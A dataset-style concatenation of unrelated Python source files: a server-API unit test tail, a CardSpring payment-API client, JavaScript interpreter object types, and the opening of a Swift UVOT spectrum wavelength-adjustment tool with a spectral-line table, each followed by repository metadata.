            server = self.dtu.create_server(sapi, '')
            sids.append(server['id'])
        for sid in sids:
            try:
                sapi.get({'id': sid})
            except KeyError:
                self.fail("Failed to list servers correctly - server not found")

    """ Delete Tests """
    def test_delete_server(self):
        """Delete a server using admin credentials"""
        sapi = self.dtu.get_server_api(ADMIN_USER)
        server = self.dtu.create_server(sapi, '')
        options = {'id': server['id']}
        sapi.delete(options)
        try:
            sapi.get(options)
            # BUG FIX: dict access, as in test_create_server_dup.
            self.fail('Failed to delete Server named %s ' % server['name'])
        except NotFound:
            """ Success by Failure """

    def test_delete_server_none(self):
        """Delete a server that does not exist - expect failure"""
        try:
            sapi = self.dtu.get_server_api(ADMIN_USER)
            server_id = self.dtu.get_unique_name(16)
            options = {'id': server_id}
            sapi.delete(options)
            self.fail("Delete on non-existant server not caught")
        except NotFound:
            """ Success by Failure """

    def test_delete_server_badcred(self):
        """Delete a server using tenant credentials - expect failure"""
        try:
            sapi = self.dtu.get_server_api(ADMIN_USER)
            server = self.dtu.create_server(sapi, '')
            sapi2 = self.dtu.get_server_api(USER1)
            options = {'id': server['id']}
            sapi2.delete(options)
            self.fail('Allowed Tenant to delete Server')
        except Forbidden:
            """ Success by Failure """

    @staticmethod
    def get_test_suite():
        """
        Gather all the tests from this module in a test suite.
        """
        # BUG FIX: this was an instance method but is invoked on the class
        # (TestServer.get_test_suite() in run_server_suite), which raised an
        # unbound-method TypeError.  @staticmethod keeps both call styles
        # working.
        test_suite = unittest.TestSuite()
        test_suite.addTest(unittest.makeSuite(TestServer))
        return test_suite
def run_server_suite():
    """Run every TestServer test with the plain-text runner."""
    suite = TestServer.get_test_suite()
    unittest.TextTestRunner().run(suite)
|
UTF-8
|
Python
| false | false | 2,014 |
9,036,611,219,130 |
c9fc5352c5e1e3fb4fa94a201594cf1798d69ef6
|
6b6241eedad5f533f8ffe0c1e3651ea7fb91a8a0
|
/CardSpringActions.py
|
0297eb7ee1e04650e60e440b0120a3b2410153c4
|
[] |
no_license
|
KFishner/tivly2012
|
https://github.com/KFishner/tivly2012
|
edccac34ad4ba22b1470e9654d301fc5dd163a9e
|
be3989f18a0faf1222d85e923c6a881234facbcc
|
refs/heads/master
| 2020-05-17T21:38:29.686982 | 2012-10-06T07:01:17 | 2012-10-06T07:01:17 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
'''
Created on Jun 30, 2012
@author: bryanantigua
'''
import urllib2
import urllib
import httplib2
from web1 import settings
def authenticate():
    """Install a global urllib2 opener with CardSpring basic auth and
    JSON/form headers; subsequent urllib2.urlopen calls use it."""
    mgr = urllib2.HTTPPasswordMgrWithDefaultRealm()
    mgr.add_password(None, "api.cardspring.com",
                     settings.CARDSPRING_APP_ID, settings.CARDSPRING_APP_SECRET)
    opener = urllib2.build_opener(urllib2.HTTPBasicAuthHandler(mgr))
    opener.addheaders = [('Accept', 'application/json'),
                         ("Content-Type", "application/x-www-form-urlencoded")]
    urllib2.install_opener(opener)
def authenticateWithHttplib2():
    """Return {'h': authenticated httplib2.Http, 'header': request headers}.

    Used for the HTTP verbs (DELETE/PUT) urllib2 cannot send.
    """
    http = httplib2.Http()
    http.add_credentials(settings.CARDSPRING_APP_ID, settings.CARDSPRING_APP_SECRET)
    headers = {"Content-type": "application/x-www-form-urlencoded",
               "Accept": "application/json"}
    return {'h': http, 'header': headers}
######################################################################
##### USER ACTIONS #####
######################################################################
def createAUser(csID):
    """POST a new CardSpring user with user_id *csID*."""
    authenticate()
    body = urllib.urlencode({'user_id': csID})
    return urllib2.urlopen('https://api.cardspring.com/v1/users', body)
def getAUser(csID):
    """GET a single user by id."""
    authenticate()
    return urllib2.urlopen('https://api.cardspring.com/v1/users/' + csID)
def getUsers():
    """GET the list of all users."""
    authenticate()
    return urllib2.urlopen('https://api.cardspring.com/v1/users')
def deleteAUser(csID):
    """DELETE a user (httplib2, since urllib2 cannot send DELETE)."""
    auth = authenticateWithHttplib2()
    return auth['h'].request("https://api.cardspring.com/v1/users/" + csID,
                             method="DELETE", headers=auth['header'])
######################################################################
##### APP ACTIONS #####
######################################################################
def deleteAnApp(businessID, appID):
    """DELETE an app from a business."""
    auth = authenticateWithHttplib2()
    url = "https://api.cardspring.com/v1/businesses/" + businessID + "/apps/" + appID
    return auth['h'].request(url, method="DELETE", headers=auth['header'])
def modifyAnApp(businessID,appID, values):
    """PUT *values* (dict of fields) onto an existing app."""
    auth = authenticateWithHttplib2()
    url = 'https://api.cardspring.com/v1/businesses/' + businessID + '/apps/' + appID
    return auth['h'].request(url, method="PUT",
                             body=urllib.urlencode(values), headers=auth['header'])
def createAnApp(businessID,redemptionValues):
    """POST a new app for a business.

    Example of redemptionValues:
    {'redemption[discount_summary]': '10 Off 50',
     'redemption[discount_description]': 'Save $10 ...',
     'redemption[type]': 'terminal_discount',
     'redemption[min_purchase]': '5000', 'redemption[amount]': '1000',
     'notification[type]': 'all_payment_events',
     'notification[min_purchase]': '5000'}
    """
    authenticate()
    body = urllib.urlencode(redemptionValues)
    return urllib2.urlopen('https://api.cardspring.com/v1/businesses/' + businessID + '/apps', body)
#def signUpForAllApps
def getAnApp(businessID,appID):
    """GET one app of a business."""
    authenticate()
    return urllib2.urlopen('https://api.cardspring.com/v1/businesses/' + businessID + '/apps/' + appID)
def listApps(businessID):
    """GET every app of a business."""
    authenticate()
    return urllib2.urlopen('https://api.cardspring.com/v1/businesses/' + businessID + '/apps')
#=================== SPECIFIC TO USER================================#
def getUserAppConnections(csID):
    """GET all app connections of user *csID*."""
    authenticate()
    return urllib2.urlopen('https://api.cardspring.com/v1/users/'+csID+'/apps')
def createUserAppConnection(csID,appID):
    """POST a connection between user *csID* and app *appID*."""
    authenticate()
    values = {'app_id':appID}
    data = urllib.urlencode(values)
    return urllib2.urlopen('https://api.cardspring.com/v1/users/'+csID+'/apps',data)
def getUserAppConnection(csID,appID):
    """GET a single user<->app connection.

    BUG FIX: the path separator before the app id was missing
    ('/apps'+appID gave '/appsAPPID'), so the request always 404'd.
    Every sibling endpoint (e.g. deleteAUserApp) uses '/apps/'+appID.
    """
    authenticate()
    return urllib2.urlopen('https://api.cardspring.com/v1/users/'+csID+'/apps/'+appID)
def deleteAUserApp(csID,appID):
    """DELETE a user<->app connection."""
    auth = authenticateWithHttplib2()
    response = auth['h'].request('https://api.cardspring.com/v1/users/'+csID+'/apps/'+appID, method = "DELETE",headers = auth['header'])
    return response
######################################################################
##### CARD ACTIONS #####
######################################################################
def deleteACard(csID,token):
auth = authenticateWithHttplib2()
response = auth['h'].request("https://api.cardspring.com/v1/users/"+csID+'/cards/'+token, method = "DELETE", headers = auth['header'])
return response
def createACard(csID,cardNumber,exp):
authenticate()
values = {'pan':cardNumber,'expiration':exp}
data = urllib.urlencode(values)
return urllib2.urlopen('https://api.cardspring.com/v1/users/'+csID+'/cards',data)
def retrieveACard(csID,token):
authenticate()
return urllib2.urlopen('https://api.cardspring.com/v1/users/'+csID+'/cards/'+token)
def deleteABusinessConnection(businessID):
    """Delete the connection to a business (HTTP DELETE)."""
    auth = authenticateWithHttplib2()
    target = "https://api.cardspring.com/v1/businesses/"+businessID+"/connection"
    return auth['h'].request(target, method = "DELETE", headers = auth['header'])
######################################################################
##### BUSINESS ACTIONS #####
######################################################################
def getAllBusinesses(filters):
    """List businesses matching `filters` (dict of query parameters)."""
    authenticate()
    payload = urllib.urlencode(filters)
    return urllib2.urlopen('https://api.cardspring.com/v1/businesses', payload)
def getABusiness(businessID):
    """Fetch a single business record by id."""
    authenticate()
    endpoint = 'https://api.cardspring.com/v1/businesses/'+businessID
    return urllib2.urlopen(endpoint)
def getAllStores(businessID):
    """List every store location of a business."""
    authenticate()
    endpoint = 'https://api.cardspring.com/v1/businesses/'+businessID+'/stores'
    return urllib2.urlopen(endpoint)
def getAStore(businessID,storeID):
    """Fetch one store location of a business."""
    authenticate()
    endpoint = 'https://api.cardspring.com/v1/businesses/'+businessID+'/stores/'+storeID
    return urllib2.urlopen(endpoint)
def createBusinessConnection(businessID):
    """Open a connection to a business with the full permission set."""
    authenticate()
    # Request all three permissions; authorization is by signature.
    payload = urllib.urlencode({'permissions' :'notification,purchase_data,redemption', 'authorization':'signature'})
    endpoint = 'https://api.cardspring.com/v1/businesses/'+ businessID+'/connection'
    return urllib2.urlopen(endpoint, payload)
def getBusinessConnections(activity):
    """List businesses filtered by their connection activity state."""
    authenticate()
    payload = urllib.urlencode({'connection':activity})
    return urllib2.urlopen('https://api.cardspring.com/v1/businesses', payload)
######################################################################
##### RANDO ACTIONS #####
######################################################################
def getPublisherInfo():
    """Fetch the root publisher record for the authenticated account."""
    authenticate()
    return urllib2.urlopen('https://api.cardspring.com/v1')
def getAllEvents():
    """List all events for the authenticated account."""
    authenticate()
    return urllib2.urlopen('https://api.cardspring.com/v1/events')
# Only in Test Environment....
def testTransaction(values):
    """Simulate a transaction (only available in the test environment)."""
    authenticate()
    payload = urllib.urlencode(values)
    return urllib2.urlopen('https://api.cardspring.com/v1/transactions', payload)
|
UTF-8
|
Python
| false | false | 2,012 |
19,645,180,417,994 |
5e9dc644ed88e3611caf66e64373a91be2a7870a
|
7ce912c0a0d67a5bd6ffafae1b95d00feb88c899
|
/jspy/js.py
|
f72c3a2616cc854ecb4ec501507a8525d177815f
|
[] |
no_license
|
saner/jspy
|
https://github.com/saner/jspy
|
22ce6119fe18a389c1ef3031756455f33ef0bf3a
|
2d4dc3f8ee9ed3c81a468d04e7575edb7f023eda
|
refs/heads/master
| 2021-01-16T22:40:41.366460 | 2011-10-11T20:01:16 | 2011-10-11T20:01:16 | 2,456,322 | 1 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
"""Module containing basic JavaScript types and objects."""
from collections import namedtuple
import sys
UNDEFINED = object()
EMPTY = object()
NORMAL = object()
BREAK = object()
CONTINUE = object()
RETURN = object()
THROW = object()
# Completion specification type as defined in [ECMA-262 8.9]
Completion = namedtuple('Completion', 'type value target')
EMPTY_COMPLETION = Completion(NORMAL, EMPTY, EMPTY)
def is_abrupt(completion):
return completion.type is not NORMAL
class Object(object):
    """JavaScript Object as defined in [ECMA-262 8.6].

    Properties live in the dict `self.d`, keyed by the *string* form of
    the property name (JS property names are always strings).
    """
    def __init__(self, items=None):
        # Fresh dict per instance; never share a mutable default.
        if items is None:
            items = {}
        self.d = items
    def __getitem__(self, name):
        return self.d[str(name)]
    def __setitem__(self, name, value):
        self.d[str(name)] = value
    def get(self, name):
        """Return the property value, or UNDEFINED when it is missing."""
        try:
            return self.d[str(name)]
        except KeyError:
            return UNDEFINED
    def get_binding_value(self, name):
        return self[name]
    def set_mutable_binding(self, name, value):
        self[name] = value
    def __repr__(self):
        return '%s(%r)' % (self.__class__.__name__, self.d)
    def __eq__(self, other):
        # Fixed: comparing against a non-Object used to raise
        # AttributeError (no `.d`); NotImplemented lets Python fall back
        # to its default comparison instead.
        if not isinstance(other, Object):
            return NotImplemented
        return self.d == other.d
    def __ne__(self, other):
        # Python 2 does not derive __ne__ from __eq__, so define it.
        result = self.__eq__(other)
        if result is NotImplemented:
            return result
        return not result
class Array(Object):
    """JavaScript Array as defined in [ECMA-262 15.4].

    Elements are stored as Object properties keyed by the float index's
    string form (e.g. '0.0').
    """
    # Display at most this many leading elements in repr()/str().
    max_repr_len = 23
    def __init__(self, items=None):
        if items is None:
            items = []
        super(Array, self).__init__()
        for i, item in enumerate(items):
            self[float(i)] = item
    def _shown_items(self):
        # Shared by __repr__/__str__ (previously duplicated): the leading
        # elements up to max_repr_len, with holes filled by UNDEFINED.
        keys = [int(float(key)) for key in self.d]
        max_key = max(keys) if keys else -1
        return [self.get(float(i)) for i in range(0, min(max_key, self.max_repr_len) + 1)]
    def __repr__(self):
        return 'Array(%r)' % self._shown_items()
    def __str__(self):
        return '[%s]' % ', '.join(str(item) for item in self._shown_items())
class Function(object):
    """Function object as defined in [ECMA-262 15.3].
    Algorithm for creating Function objects is in [ECMA-262 13.2].

    `body` is expected to provide eval(context) and get_declared_vars()
    (an AST node from the interpreter); `scope` is the ExecutionContext
    captured at definition time (the closure).
    """
    def __init__(self, parameters, body, scope):
        self.parameters = parameters
        self.body = body
        self.scope = scope
        # Hoisted `var` names, resolved once at creation time.
        self.declared_vars = body.get_declared_vars()
    def call(self, this, args):
        """Internal [[Call]] method of Function object.
        See [ECMA-262 13.2.1] for a basic algorithm."""
        # NOTE: `this` is accepted but not bound into the function
        # context here.
        function_context = self.prepare_function_context(args)
        result = self.body.eval(function_context)
        if result.type is RETURN:
            return result.value
        else:
            # No return statement in function
            return UNDEFINED
    def prepare_function_context(self, args):
        # New scope chained to the closure scope; declared vars start
        # out as UNDEFINED, then arguments are layered on top.
        local_vars_dict = dict((name, UNDEFINED) for name in self.declared_vars)
        local_vars_dict.update(self.prepare_args_dict(args))
        return ExecutionContext(local_vars_dict, parent=self.scope)
    def prepare_args_dict(self, args):
        # `arguments` is always bound; missing positional args stay
        # UNDEFINED, extra args are reachable only through `arguments`.
        result = {'arguments': args}
        for name in self.parameters:
            result[name] = UNDEFINED
        for name, value in zip(self.parameters, args):
            result[name] = value
        return result
    def __repr__(self):
        return 'Function(parameters=%r, body=%r, scope=%r)' % (self.parameters,
                                                               self.body,
                                                               self.scope)
class NativeFunction(object):
    """Wraps a Python callable so JavaScript code can invoke it.

    The callable receives (this, args) exactly like Function.call.
    """
    def __init__(self, f):
        self.f = f
    def call(self, this, args):
        """Internal [[Call]]: delegate straight to the wrapped callable."""
        return self.f(this, args)
    def __repr__(self):
        return 'NativeFunction(f=%r)' % (self.f)
class Console(Object):
    """Global `console` object, behaving similar to Firebug's one."""
    def __init__(self, out=None):
        # Default to stdout; the property dict exposes `log` to JS code.
        if out is None:
            out = sys.stdout
        self.out = out
        self.d = {'log': NativeFunction(self.log)}
    def log(self, this, args):
        """Write the space-joined string forms of `args`, then a newline."""
        text = ' '.join(str(arg) for arg in args)
        self.out.write(text)
        self.out.write('\n')
class ReferenceError(RuntimeError):
    # NOTE: intentionally shadows Python's builtin ReferenceError; raised
    # for unresolvable JavaScript references ([ECMA-262 8.7]).
    pass
class ExecutionContext(object):
    """A chained variable scope: lookups fall back to the parent context."""
    def __init__(self, env, parent=None):
        assert isinstance(env, dict)
        self.env = env
        self.parent = parent
    def __getitem__(self, name):
        # Walk the scope chain iteratively instead of recursing.
        ctx = self
        while True:
            if name in ctx.env:
                return ctx.env[name]
            if ctx.parent is None:
                raise ReferenceError('Reference %r not found in %r' % (name, ctx))
            ctx = ctx.parent
    def __setitem__(self, name, value):
        self.env[name] = value
    def get_binding_value(self, name):
        return self[name]
    def set_mutable_binding(self, name, value):
        # Find the innermost scope that already binds `name`; if none
        # does, write into the global (root) scope.
        ctx = self
        while name not in ctx.env and ctx.parent is not None:
            ctx = ctx.parent
        # XXX: Should I support strict or non-strict mode?
        ctx.env[name] = value
    def get_this_reference(self):
        return self['this']
    def __repr__(self):
        return 'ExecutionContext(%r, parent=%r)' % (self.env, self.parent)
class Reference(object):
    """JavaScript reference specification type as defined in [ECMA-262 8.7].

    A (name, base) pair: `base` is the object/environment holding the
    binding, or UNDEFINED when the reference could not be resolved.
    """
    def __init__(self, name, base):
        self.name = name
        self.base = base
    def is_unresolvable(self):
        return self.base is UNDEFINED
    def has_primitive_base(self):
        # NOTE: `basestring` is Python-2-only.
        return isinstance(self.base, (basestring, float, bool))
    def is_property(self):
        return isinstance(self.base, Object) or self.has_primitive_base()
    def get_value(self):
        # Raises the module's ReferenceError for unresolved references.
        if self.is_unresolvable():
            raise ReferenceError("%r is unresolvable" % self)
        return self.base.get_binding_value(self.name)
    def put_value(self, value):
        if self.is_unresolvable():
            raise ReferenceError("%r is unresolvable" % value)
        self.base.set_mutable_binding(self.name, value)
    def __repr__(self):
        return 'Reference(%r, %r)' % (self.name, self.base)
def get_value(obj):
    """Returns a value of `obj`, resolving a reference if needed.
    See [ECMA-262 8.7.1] for details."""
    return obj.get_value() if isinstance(obj, Reference) else obj
def put_value(obj, value):
    """Sets the value of `obj` reference to `value`.
    See [ECMA-262 8.7.2] for details."""
    # Guard clause: only references can be written through.
    if not isinstance(obj, Reference):
        raise ReferenceError("Can't put a value of non-reference object %r" % obj)
    obj.put_value(value)
|
UTF-8
|
Python
| false | false | 2,011 |
8,564,164,793,648 |
726390acbe3782b427b55f37c3d46ff42c597949
|
a1e3bdc5b6b1efdf94f09799c38f7f44ba025c4e
|
/uvotpy/uvotspec.py
|
3d7de0837b8d0a21041952f6187025ff95d96ca3
|
[
"BSD-3-Clause"
] |
permissive
|
svalenti/uvotpy
|
https://github.com/svalenti/uvotpy
|
73e31c35408a314c3aa02c971d2fb1799d043a0a
|
6eacccf4e8bf4b8ca90994f2a51e09bb74d4d3d2
|
refs/heads/master
| 2021-01-18T04:18:53.260847 | 2014-06-02T11:33:21 | 2014-06-02T11:33:21 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
#!/usr/bin/env python
# -*- coding: iso-8859-15 -*-
'''
Work with UVOT spectra:
- adjust the wavelengths
- flag bad quality data
'''
# Developed by N.P.M. Kuin (MSSL/UCL)
__version__ = '20140424-0.0.1'
import numpy as np
import matplotlib.pyplot as plt
from stsci.convolve import boxcar
from astropy.io import fits
from matplotlib.lines import Line2D
# data
# Spectral-line catalogue used for annotating plots: keyed by ion (or
# line-set) name; each entry gives the vacuum wavelength in Angstrom and
# the label drawn on the plot.
spdata = {
   'HI':[
	{'name':'Ly-alpha' ,'transition':'1s-2' ,'wavevac':1215.67,  'label':r'Ly$\alpha$'},
	{'name':'Ly-beta'  ,'transition':'1s-3' ,'wavevac':1025.722, 'label':r'Ly$\beta$'},
	{'name':'Ly-gamma' ,'transition':'1s-4' ,'wavevac':972.537,  'label':r'Ly$\gamma$'},
	{'name':'Ly-limit' ,'transition':'1s-40','wavevac':912.3,    'label':r'Ly-limit'},
	{'name':'H-alpha'  ,'transition':'2-3'  ,'wavevac':6564.63,  'label':r'H$\alpha$'},
	{'name':'H-beta'   ,'transition':'2-4'  ,'wavevac':4862.69,  'label':r'H$\beta$'},
	{'name':'H-gamma'  ,'transition':'2-5'  ,'wavevac':4341.69,  'label':r'H$\gamma$'},
	{'name':'H-delta'  ,'transition':'2-6'  ,'wavevac':4102.899, 'label':r'H$\delta$'},
	{'name':'H-epsilon','transition':'2-7'  ,'wavevac':3971.202, 'label':r'H$\epsilon$'},
	{'name':'H-6'      ,'transition':'2-8'  ,'wavevac':3890.16,  'label':r'H6'},
	{'name':'H-limit'  ,'transition':'2s-40','wavevac':3656,     'label':r'Ba-limit'},
	{'name':'Pa-alpha' ,'transition':'3-4'  ,'wavevac':18756.096,'label':r'Pa$\alpha$'},
	{'name':'Pa-beta'  ,'transition':'3-5'  ,'wavevac':12821.576,'label':r'Pa$\beta$'},
	{'name':'Pa-gamma' ,'transition':'3-6'  ,'wavevac':10941.082,'label':r'Pa$\gamma$'},
	{'name':'Pa-delta' ,'transition':'3-7'  ,'wavevac':10052.123,'label':r'Pa$\delta$'},
	{'name':'Pa-5'     ,'transition':'3-8'  ,'wavevac':9548.587, 'label':r'Pa5'},
	{'name':'Pa-limit' ,'transition':'3s-40','wavevac':8252.2,   'label':r'Pa-limit'},
	],
   'HeI':[
        {'transition':'1s2p 3Po-1s3s 3S ','wavevac':7067.14   ,'label':u'HeI'},
        {'transition':'1s2p 1Po-1s3d 1D ','wavevac':6679.9956 ,'label':u'HeI'},
        {'transition':'1s2p 3Po-1s3d 3D ','wavevac':5877.249  ,'label':u'HeI'},
        {'transition':'1s2s 1S -1s3p 1Po','wavevac':5017.0772 ,'label':u'HeI'},
        {'transition':'1s2s 3Po-1s4d 4D ','wavevac':4472.735  ,'label':u'HeI'},
        {'transition':'1s2s 3S -1s3p 3Po','wavevac':3889.75   ,'label':u'HeI'},
        {'transition':'1s2s 3S -1s4p 3Po','wavevac':3188.667  ,'label':u'HeI'},
        {'transition':'2p2 3P -2p3d 3Do','wavevac':3014.59   ,'label':u'HeI'},
        {'transition':'1s2s 3S -1s5p 3Po','wavevac':2945.967  ,'label':u'HeI'},
        {'transition':'1s2 1S -1s1p 1Po','wavevac':584.334   ,'label':u'HeI'},
	],
   'HeII':[
        {'transition':'4 - 6','wavevac':6562.0, 'label':u'HeII'},
        {'transition':'4 - 7','wavevac':5411.5, 'label':u'HeII'},# see J.D.Garcia and J.E. Mack,J.Opt.Soc.Am.55,654(1965)
        {'transition':'3 - 4','wavevac':4687.1, 'label':u'HeII'},
        {'transition':'3 - 5','wavevac':3203.95,'label':u'HeII'},
        {'transition':'3 - 6','wavevac':2734.13,'label':u'HeII'},
        {'transition':'3 - 7','wavevac':2511.2, 'label':u'HeII'},
        {'transition':'3 - 8','wavevac':2385.4, 'label':u'HeII'},
        {'transition':'2 - 3','wavevac':1640.47,'label':u'HeII'},
        {'transition':'2 - 4','wavevac':1215.17,'label':u'HeII'},
        {'transition':'2 - 6','wavevac':1025.30,'label':u'HeII'},
	],
   'nova':[  # add also H, HeI, HeII
        #
        {'transition':'','wavevac':1750  , 'label':u'NIII]'},
        {'transition':'','wavevac':1908.7, 'label':u'CIII]'},
        {'transition':'','wavevac':2143  , 'label':u'NII]'},
        #{'transition':'','wavevac':2151.0, 'label':u'NIV]'},
        {'transition':'','wavevac':2297  , 'label':u'CIII'},
        {'transition':'','wavevac':2325.4, 'label':u'CII'},
        {'transition':'','wavevac':2326.1, 'label':u'CII'},
        {'transition':'','wavevac':2471.0, 'label':u'OII]'},
        {'transition':'5D-3D','wavevac':2473, 'label':u'Ni IV]'},
        {'transition':'5D-3D','wavevac':2522.5, 'label':u'Ni IV]'},
        {'transition':'','wavevac':2796.4, 'label':u'MgII'},
        {'transition':'','wavevac':2803.5, 'label':u'MgII'},
        {'transition':'','wavevac':2937.4, 'label':u'MgII*'},
        {'transition':'','wavevac':3130.0, 'label':u'OII*,OIII*,OIV*'},
        {'transition':'','wavevac':3345.8, 'label':u'[NeV]'},
        {'transition':'','wavevac':3425.9, 'label':u'[NeV]'},
        {'transition':'','wavevac':3727  , 'label':u'[OIII]'},
        {'transition':'','wavevac':4363  , 'label':u'[OIII]'},
        {'transition':'','wavevac':4636  , 'label':u'NIII*'},
        {'transition':'','wavevac':4643  , 'label':u'NIII*'},
        {'transition':'','wavevac':4648.7, 'label':u'CIII*'},
        {'transition':'','wavevac':4651.2, 'label':u'OIII*'},
        {'transition':'','wavevac':4959  , 'label':u'[OIII]'},
        {'transition':'','wavevac':5007  , 'label':u'[OIII]'},
        {'transition':'','wavevac':5755  , 'label':u'[NII]'},
        #{'transition':'','wavevac':.0, 'label':u''}
        #{'transition':'','wavevac':.0, 'label':u''}
	],
   'V339_Del':[  # add also H, HeI, HeII
        #
	{'transition':'2-4'  ,'wavevac':4862.69,  'label':r'H$\beta$'},
	{'transition':'2-5'  ,'wavevac':4341.69,  'label':r'H$\gamma$'},
	{'transition':'2-6'  ,'wavevac':4102.899, 'label':r'H$\delta$'},
	{'transition':'2-7'  ,'wavevac':3971.202, 'label':r'H$\epsilon$'},
        #{'transition':'4 - 7','wavevac':5411.5, 'label':u'HeII'},
        {'transition':'3 - 4','wavevac':4687.1, 'label':u'He II'},
        {'transition':'3 - 5','wavevac':3203.95,'label':u'He II'},
        {'transition':'3 - 6','wavevac':2734.13,'label':u'He II+O II*'},
        {'transition':'2s2.2p2(3P)4s-2s2.2p2(3P)3p','wavevac':2747.4, 'label':''},
	# unclutter {'transition':'3 - 6','wavevac':2734.13,'label':u'HeII'},
        # unclutter {'transition':'2s2.2p2(3P)4s-2s2.2p2(3P)3p','wavevac':2747.4, 'label':u'OII*'},
        {'transition':'3 - 7','wavevac':2511.2, 'label':u'He II'},
        {'transition':'3 - 8','wavevac':2385.4, 'label':u'He II'},
        {'transition':'','wavevac':1750  , 'label':u'N III]'},
        {'transition':'','wavevac':1908.7, 'label':u'C III]'},
        #{'transition':'','wavevac':1987.7, 'label':u'S IX]*'},
        # declutter {'transition':'','wavevac':2143  , 'label':u'N II]'},
        {'transition':'','wavevac':2147  , 'label':u'N II]+IV]'},
        # declutter {'transition':'','wavevac':2151.0, 'label':u'N IV]'},
        #{'transition':'','wavevac':2321.66, 'label':u'O III]'},
        {'transition':'','wavevac':2325.6, 'label':u'C II+[O II]'},
        {'transition':'','wavevac':2332.1, 'label':''},
        # unclutter {'transition':'','wavevac':2325.6, 'label':u'C II'},
        # unclutter {'transition':'','wavevac':2332.1, 'label':u'[O III]'},
        #{'transition':'5D-3D','wavevac':2437.2, 'label':u'Ni V]'},
        {'transition':'','wavevac':2471.0, 'label':u'O II]'},
        #{'transition':'','wavevac':2522.5, 'label':u'Ni V]'},
        #{'transition':'','wavevac':2784, 'label':u'Mg V]'},
        {'transition':'','wavevac':2800, 'label':u'Mg II'},
        {'transition':'','wavevac':2844.9, 'label':u'C III]'},
        {'transition':'','wavevac':2937.4, 'label':u'Mg II*'},
        #{'transition':'','wavevac':2949, 'label':u'Mg V]'},
        # unsure of this one {'transition':'','wavevac':2990, 'label':u'Ni VII]'},
        {'transition':'2s2.2p2(3P)4s-2s2.2p2(3P)3p','wavevac':3134.2, 'label':u'O II*'},
        # unclutter {'transition':'2s2.2p2(3P)4s-2s2.2p2(3P)3p','wavevac':3287.5, 'label':u'OII*'},
        #{'transition':'','wavevac':.0, 'label':u''}
        #{'transition':'','wavevac':3132, 'label':u'?Be II ?Fe II '},
        #{'transition':'2s2 2p2 3P 0-2s2 2p2 1D 2','wavevac':3301.4, 'label':u'[NeV]'},
        # declutter {'transition':'2s2 2p2 3P 1-2s2 2p2 1D 2','wavevac':3346.8, 'label':u'[NeV]'},
        # declutter {'transition':'2s2 2p2 3P 1-2s2 2p2 1D 2','wavevac':3426.9, 'label':u'[NeV]'},
        #{'transition':'3d4 5D-3d4 3G','wavevac':3446.61, 'label':u'[FeV]'},
        {'transition':'','wavevac':3448, 'label':u'N IV*'},
        #declutter {'transition':'','wavevac':3444.6, 'label':u'N IV*'},
        #declutter {'transition':'','wavevac':3461.4, 'label':u'N IV*'}, # opt. thick, especially at later times
        {'transition':'2s2 2p4 3P 2-2s2 2p4 3P 0','wavevac':3461.7, 'label':u'[Ca XIII]'},
        #{'transition':'3d4 5D-3d4 3G','wavevac':3464.5, 'label':u'[FeV]'},
        {'transition':'','wavevac':4363  , 'label':u'[O III]'},
        # declutter {'transition':'','wavevac':4640  , 'label':u'N III*'},
        {'transition':'','wavevac':4645, 'label':u'C III*+N III*'},
        # declutter {'transition':'','wavevac':4649, 'label':u'C III*'},
        {'transition':'','wavevac':4959  , 'label':u'[O III]'},
        {'transition':'','wavevac':5007  , 'label':u'[O III]'},
        {'transition':'','wavevac':5755  , 'label':u'[N II]'},
        #{'transition':'','wavevac':.0, 'label':u''}
        #{'transition':'','wavevac':.0, 'label':u''}
	],
   }
############################
class DraggableSpectrum:
    """
    Drag spectrum until the wavelengths are correctly lined up

    Wraps a matplotlib Line2D (`spectrum`): mouse drags shift the line's
    x-data, and the accumulated shift is reported via out_delwav().
    """
    def __init__(self, ax, spectrum,):
        self.spectrum = spectrum
        self.press = None     # drag-start state, set while a button is down
        self.delwav = 0.0     # total wavelength shift accumulated over drags
        self.incwav = 0.0     # shift of the drag currently in progress
        self.ax = ax

    def connect(self):
        'connect to all the events we need'
        self.cidpress = self.spectrum.figure.canvas.mpl_connect(
            'button_press_event', self.on_press)
        self.cidrelease = self.spectrum.figure.canvas.mpl_connect(
            'button_release_event', self.on_release)
        self.cidmotion = self.spectrum.figure.canvas.mpl_connect(
            'motion_notify_event', self.on_motion)
        self.cidkey = self.spectrum.figure.canvas.mpl_connect(
            'key_press_event', self.on_key)
        print "active"

    def on_press(self, event):
        'on button press we will store some data'
        if event.inaxes != self.spectrum.axes: return
        # Remember where the drag started and the line's x-data at that moment.
        self.press = event.x, event.y, event.xdata, event.ydata, self.spectrum.get_xdata()
        print "start position (%f,%e)"%(event.xdata,event.ydata)

    def on_motion(self, event):
        'on motion we will move the spectrum if the mouse is over us'
        if self.press is None: return
        if event.inaxes != self.spectrum.axes: return
        x0, y0, xpress, ypress, xdata = self.press
        dx = event.xdata - xpress
        self.incwav = dx
        self.spectrum.set_xdata(xdata+dx)
        self.ax.figure.canvas.draw()

    def on_release(self, event):
        'on release we reset the press data'
        # Fold the finished drag into the running total.
        self.delwav += self.incwav
        self.press = None
        self.ax.figure.canvas.draw()
        if event.inaxes == self.spectrum.axes:
            print "end position (%f,%e)"%(event.xdata,event.ydata)

    def on_key(self,event):
        'on press outside canvas disconnect '
        print "you pushed the |%s| key"%event.key
        print "disconnecting ..."

    def disconnect(self):
        'disconnect all the stored connection ids'
        self.spectrum.figure.canvas.mpl_disconnect(self.cidpress)
        self.spectrum.figure.canvas.mpl_disconnect(self.cidrelease)
        self.spectrum.figure.canvas.mpl_disconnect(self.cidmotion)
        self.spectrum.figure.canvas.mpl_disconnect(self.cidkey)
        print "disconnected"

    def out_delwav(self):
        # Total shift (Angstrom) accumulated over all completed drags.
        return self.delwav
def uvot_adjust_wavelength_manually(file=None,openfile=None,openplot=None,
    ylim=[None,None],ions=['HI','HeII']):
    """manually adjust the wavelength scale

    Parameters
    ----------
    file : path
       extracted spectral data (i.e., after running uvotgetspec.getSpec()
    fileopen : filehandle
       opened spectral data file
    openplot : axis
       axis instance to use
    ylim : list(2)
       list of length 2 with limits of the Y-axis or None
    ions : list
       list of ions to use for annotation
       valid ions are spdata.keys()

    Notes
    -----
    The header will be updated with the value of the wavelength shift
    The wavelengths in the second extension lambda column will be shifted.
    The response file will need to be recreated separately.

    Returns the figure instance
    """
    # data
    # Need write access: either reuse the open handle (reopening it in
    # 'update' mode if necessary) or open the named file ourselves.
    if openfile != None:
       f = openfile
